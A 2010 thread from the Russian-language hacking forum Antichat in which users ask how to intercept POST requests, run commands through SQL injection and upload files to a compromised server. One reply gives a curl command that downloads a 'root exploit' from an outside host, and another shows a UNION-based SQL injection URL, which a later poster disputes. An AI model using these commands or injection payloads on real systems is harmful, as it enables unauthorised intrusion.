ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
28.03.2010, 14:33
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940
Репутация:
1
|
|
помогите со скриптом для перехвата пост запроса))
|
|
|
28.03.2010, 16:56
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
если ты о пхп -
, если ты о качалке -
http://www.google.com.ua/search?hl=ru&safe=off&q=man+curl&meta=&aq=0&aqi=g6 &aql=&oq=%D1%8C%D1%84%D1%82+%D1%81%D0%B3%D0%BA&gs_ rfai=
но если лень, тогда
curl -O sploent http://antochat.re/priv8/root_spl
|
|
|
|
28.03.2010, 16:59
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от $n@ke
если ты о пхп - , если ты о качалке -
но если лень, тогда
он говорит об аплоаде на сервер по http, наверное
|
|
|
|
28.03.2010, 17:34
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927
Репутация:
0
|
|
Как через sql инъекцию выполнить команду, и просмотреть phpinfo ? Допустим при таком запросе: http://site.ru/index.php?id=-1+union+select+1,2,3-- принтабельный столбец 2.
|
|
|
|
28.03.2010, 17:37
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Как через sql инъекцию выполнить команду, и просмотреть phpinfo ? Допустим при таком запросе: http://site.ru/index.php?id=-1+union+select+1,2,3-- принтабельный столбец 2.
Код:
http://site.ru/index.php?id=-1+union+select+1,column_name,3+from+information_schema.columns+where+table_name='phpinfo'+--+
Если я правильно понял  .
|
|
|
|
28.03.2010, 17:56
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от CyberHunter
Код:
http://site.ru/index.php?id=-1+union+select+1,column_name,3+from+information_schema.columns+where+table_name='phpinfo'+--+
Если я правильно понял . O_o WTF ????
Убедительная просьба, если не понимаешь о чём речь, не нужно советов. Судя по твоим постам, просто - не нужно советов!
a1ertso
Никак в мускуле не выполнить комманду.
Продвинутые базы позволяют выполнять, но не php код, а системные комманды, как зависит от оси и базы, но в 99% случаев это сделать не удастся из-за прав.
|
|
|
|
28.03.2010, 18:36
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от Jokester
O_o WTF ????
Убедительная просьба, если не понимаешь о чём речь, не нужно советов. Судя по твоим постам, просто - не нужно советов!
a1ertso
Никак в мускуле не выполнить комманду.
Продвинутые базы позволяют выполнять, но не php код, а системные комманды, как зависит от оси и базы, но в 99% случаев это сделать не удастся из-за прав.
Ну MySQL тоже можно внести в список этих продвинутых баз =)
Вспомни sql-бэкдор под Win.
|
|
|
|
28.03.2010, 19:18
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
хм...как можно на сервер загрузить файл, если при использовании wget и curl пишется premission denied, на на get и fetch - command not found ? есть еще способы ?
|
|
|
|
28.03.2010, 17:43
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927
Репутация:
0
|
|
CyberHunter, спасибо. А так же можно выполнять любой пхп код?
|
|
|
|
28.03.2010, 17:45
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
CyberHunter, спасибо. А так же можно выполнять любой пхп код?
Насколько я знаю, - нет. Для этого надо найти админку.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
